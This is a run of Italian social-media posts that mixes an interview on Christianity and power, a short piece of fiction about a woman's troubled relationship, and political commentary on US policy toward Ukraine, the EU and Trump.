Gesù è stato condannato e crocifisso dal potere imperiale. E stato giustiziato con la pena capitale che l'Impero assegnava ai sediziosi, ai ribelli, colpevoli del crimine peggiore: il crimen laesae maiestatis. Gesù ha rappresentato l'esempio più radicale di opposizione ai poteri di questo mondo, e infatti venne fatto fuori da un'alleanza tra potere politico romano e potere religioso ebraico espressione degli interessi dell'aristocrazia sacerdotale. Ne viene che se c'è una cosa che il cristianesimo ha da offrire, nella misura in cui è fedele a Gesù, è proprio l'opposizione ai poteri di questo mondo. Se i cristiani diventano funzionali al potere tradiscono il senso specifico della loro fede, diventano inutili in quanto credenti, equivalgono ai tanti funzionari amici del potere che la storia e l'economia producono di continuo.

Può farci un esempio?

Per riprendere le parole di Gesú, perdono sapore e risultano come il sale di cui egli parlò nel discorso della montagna chiedendosi a cosa serve il sale se ha perso sapore e rispondendo che non serve più a nulla se non a essere gettato via e calpestato dagli uomini. Sono già tanti i cortigiani, non serve che arrivino anche i cristiani. Purtroppo però essi arrivano, sono già arrivati. I cristiani devono essere il sale della terra, o il lievito della pasta, per riprendere le immagini evangeliche. Ci sono insomma due opposti estremismi da evitare: il radicalismo di chi vuole essere solo lievito senza perdersi ed entrare nella pasta (mi riferisco a quel radicalismo, a volte fanatismo, che rifiuta qualunque mediazione con la logica del mondo senza comprendere che il lievito esiste proprio in funzione della pasta) e dall'altro lato il totale allineamento al potere all'insegna del servilismo e della cortigianeria. Il vero cristianesimo sta in mezzo, distinguendo ogni volta responsabilmente l'azione da compiere o da non compiere.



Sliding doors #5


Driiiiinnnn Driiiinnnn

Lo schermo del telefonino illumina con la sua luce fioca il comodino di Anna, proiettando ombre inquietanti sulle pareti della stanza buia.

Driiiiinnnn Driiiinnnn

"Adesso chi è?" si chiede Anna mettendo il naso fuori dalle coperte con estrema riluttanza, facendo una smorfia di fastidio mentre cerca di sopportare il trillo insistente del telefono che come un picchio impazzito perforava la sua testa dolorante.

"Uff, mia sorella! La chiamo dopo"

e si rintana di nuovo sotto le coperte, cercando rifugio nel calore familiare.

"Mia sorella! Cazzo vuole a quest'ora! E quello là figurarsi se si degna di chiamare, non l'ha mai fatto, aspetta sempre che sia io ad andare là a riverirlo come una serva! LUI deve venire qui altrimenti non muovo un dito, questa volta basta!"

Era attraversata da un fiume impetuoso di rabbia incontrollabile, al punto tale che certe volte si trasformava in tremori violenti e pianti disperati che sembravano non avere fine.

"Ogni singola volta la stessa maledetta storia. Dice che sono io quella che va via e invece è lui che mi caccia via con i suoi comportamenti! Con i suoi modi cafoni da persona incivile, la sua arroganza insopportabile, la sua prepotenza che non conosce limiti!! Perché continuo ostinatamente a mettermi sempre con uomini del genere? Cosa avrò mai fatto di male nella vita per meritarmi questo?"

( Collapse )
Nel buio più totale della stanza allungò la mano tremante per cercare a tentoni un fazzoletto di carta, asciugarsi gli occhi gonfi di pianto e poi buttarlo con rabbia a terra, ad unirsi agli altri a formare un tappeto bianco intriso di dolore e delusione.

"Ogni dannata volta mi promette solennemente che non succederà più ma invece eccomi qui di nuovo, a piangere da sola nel letto come una stupida ad aspettare un minimo segno che dimostri che non sono completamente invisibile ai suoi occhi! Poi io, come al solito, lo implorerò disperatamente e lui si degnerà di venire qui, sempre dopo estenuanti preghiere, e io, come una perfetta idiota, accetterò ancora una volta le sue scuse vuote! MI ODIO PROFONDAMENTE PER QUESTO!"

Proruppe in una nuova serie di singhiozzi incontrollati e si rintanò completamente in lacrime sotto le coperte serrando gli occhi con forza, cercando di sfuggire alla realtà che la circondava.




Il Ministro Giuseppe Valditara, ha emanato oggi il decreto di adozione del Sistema nazionale di valutazione dei risultati dei dirigenti scolastici.



Gli Usa sono pronti a staccare la spina all'Ucraina. Hanno perso la guerra, o quanto meno questo pezzo di guerra, e ora cercano di limitare i danni, rifacendosi sulle risorse del paese al quale avevano promesso sostegno incondizionato fino alla vittoria. Del resto non è la prima volta che si comportano così. Ricordiamoci dei voltafaccia ai danni dei Curdi in Siria per esempio. E sono degli illusi quelli che pensano che con Biden invece erano disinteressati e mossi da amore per il diritto internazionale e per la libertà dei popoli. Stavano comunque perseguendo quello che pensavano fosse il loro interesse. Lo stanno facendo anche adesso, solo con strategie diverse.

Fonte della notizia:
milanofinanza.it/news/starlink…

milanofinanza.it/news/starlink…

in reply to Adriano Bono

L'immagine mostra un ritratto di Elon Musk in giacca e cravatta, con un testo sovrapposto che recita: "Starlink, gli Stati Uniti minacciano di staccare i collegamenti internet all'Ucraina se non firmerà l'accordo sulle risorse minerarie".

Fornito da @altbot, generato utilizzando Gemini



La pratica artistica di Caposciutti è segnata dalla scoperta attraverso i materiali che impiega adrianomaini.altervista.org/la…


Difesa, l’Italia può e deve giocare un ruolo in Europa. Parola di Volpi

@Notizie dall'Italia e dal mondo

L’Europa è una potenza economica, ma sul piano politico e strategico è ancora un continente senza voce, un gigante dai piedi d’argilla in un mondo che non aspetta e che si ridefinisce a ogni scossa geopolitica. La guerra in Ucraina ha reso evidente questa fragilità: mentre gli Stati Uniti trattano con la Russia,

in reply to Pëtr Arkad'evič Stolypin

@Pëtr Arkad'evič Stolypin rimarrà sempre un continente senza voce, se non ritorneremmo quello che eravamo una volta. E' inutile far finta di niente. Noi non ci sentiamo fratelli, per esempio con i francesi, i francesi non si sentono fratelli con noi italiani, i tedeschi non si sentono francesi, noi italiani abbiamo un'altra mentalità rispetto i tedeschi e ecc... Tanto, Gli Stati Uniti D'Europa è fallita e non nascerà MAI (per fortuna). I stati membri dell'UE pensano solo per il bene nel loro paese in senso molto egoistico rispetto agli altri stati membri. Allora, perché non smantellare tutto e non avere solo accordi commerciali come una volta?


UCRAINA: Trump abbraccia Putin, scarica Zelensky e umilia l’Ue


@Notizie dall'Italia e dal mondo
Trump silura il presidente ucraino ed esclude l'UE da trattative e ricostruzione. Gli USA puntano ad annichilire l'Europa e a separare Mosca da Pechino, per concentrare gli sforzi contro la Cina
L'articolo UCRAINA: Trump abbraccia Putin, scarica Zelensky e umilia l’Ue proviene da Pagine



di seguito un pezzo dalla newsletter Da Costa a Costa di oggi.

(nota mia, dipende sempre dalle persone, alla fine, la tenuta di tutto il resto, ed è per questo che sono infastidita da chi dà tutto già per perso, se pensiamo che non si possa fare niente, allora tutto andrà male ancora più velocemente.
e questo non perché non si vede quanto la situazione sia grave, lo si vede, fino in fondo, ma l'unica cosa che possiamo fare contro il Male, è questa, fare la nostra parte, fosse anche solo per potersi guardare allo specchio la mattina.
è quello che vogliono loro, spaventarci e dividerci e farci pensare che hanno vinto.
è ora che rilegga IT, e poi Il Signore degli Anelli)

"È presto per sapere cosa otterrà Trump, è presto per sapere dove sono questi famosi limiti, dove li troverà. Lui proverà a fare tutto quello che potrà fare e di più. Torniamo al punto di prima: non sappiamo come andrà a finire. Però sappiamo che il resto del mondo non è condannato a essere spettatore di quello che Trump dice e fa. E questo ci dice qualcosa su dove troveremo la risposta alla domanda. Non sarà nelle leggi, non sarà nelle clausole di salvaguardia, non sarà nei pesi e contrappesi: sarà nella politica, nelle persone.

Certo che servono i pesi e i contrappesi, il bilanciamento dei poteri, le leggi e le clausole di salvaguardia. Ma le istituzioni, la politica, le scelte le fanno le persone. Una democrazia come quella statunitense non arretra perché la Costituzione è scritta male o perché le leggi non permettono di fermare un governo prepotente, non esistono leggi perfette e tutte le leggi si possono cambiare: arretra se chi può opporsi decide di non farlo, se chi riceve un ordine illegale decide di obbedire, se il Congresso decide di non difendere i suoi interessi e i suoi poteri, se le proteste sono inefficaci e impopolari, se i giudici decidono così e non colà. Arretra se le persone lo permettono.

In questo momento tutte le cose che Trump dice e fa generano innanzitutto paura: i terrorizzati interlocutori ne vengono paralizzati oppure spinti a lisciargli il pelo e rabbonirlo con le coccole. Fino a quando andrà così? Quando inizieranno a generare reazioni? Quando Trump inizierà a essere indebolito dalle conseguenze delle sue azioni?

Gli alleati trattati a pesci in faccia a un certo punto smettono di essere alleati. Qualcuno risponde alle cattive con le cattive. I governi che hai umiliato trovano un modo di farti male: prima o poi avranno l’occasione giusta. Gli altri si organizzano di conseguenza. L’Europa sa da tempo di doversi rafforzare moltissimo: lo dice Draghi, mica Trump. Sarebbe ora.

Poi ci sono le unintended consequences, gli effetti collaterali indesiderati. Il tentativo di spremere i paesi mediorientali perché aumentino la produzione di petrolio farebbe scendere i prezzi, che è quello che vuole Trump: ma farebbe anche molto male alla Russia. La Cina rischia di perdere la stampella russa o di trovarsi costretta a mollarla proprio mentre la sua economia traballante affronta nuovi dazi, e intanto si sta vendicando prendendosela con Tesla, che è legata mani e piedi proprio alla Cina.

In politica interna, la luna di miele finirà presto (i sondaggi dicono che sta già finendo). Toccherà trattare col Congresso e sarà dura. Arriveranno indagini su Tizio e Caio. Arriveranno anche quelli che il mio collega Matteo Bordone chiama tecnicamente i merdoni, chiedo scusa: siamo al terzo incidente aereo in un mese di licenziamenti di massa fra chi controlla la sicurezza di voli e aeroporti, per esempio, e magari i licenziamenti non c’entrano niente ma tra un po’ sarà difficile dare la colpa a quelli di prima.

Trump ci sta provando: a mettere i piedi in testa a tutti, a farsi largo a spintoni e forza bruta, a ignorare le leggi e il Congresso, a estendere i suoi poteri e pretendere obbedienza. Ci riuscirà solo se non incontrerà resistenza.

Questa è la mia forse deludente ma onesta risposta alla popolare domanda se gli Stati Uniti sono ancora o resteranno una democrazia. Non ci stava in un tweet.

In breve
– «E i Democratici? E i Democratici che fanno? Perché non fanno niente?!». I Democratici in realtà stanno facendo quello che riescono a fare essendo appena stati cacciati dalla Casa Bianca, dalla Camera e dal Senato: i ricorsi che hanno portato alla sospensione delle decisioni più estreme di Trump sono quasi tutti opera loro, sia a livello federale che locale. Al Congresso stanno complicando e complicheranno la vita ai Repubblicani, che hanno maggioranze risicatissime. Continueranno.

Il fronte su cui per ora non riescono a far niente è quello dei consensi, ne abbiamo parlato: in questo momento, infatti, su quasi tutte le grandi questioni la maggioranza della popolazione la pensa come Trump e i Repubblicani. Come recuperare terreno? Cosa bisogna cambiare? La discussione è in corso, i giochi si faranno innanzitutto nelle moltissime primarie in vista delle elezioni di metà mandato del 2026, la campagna sottotraccia è già partita: l’inizio della traversata."

nella foto, il vassoietto con la tazzina che marito mi ha portato a letto questa mattina, il caffè nel frattempo l'ho già bevuto 🥰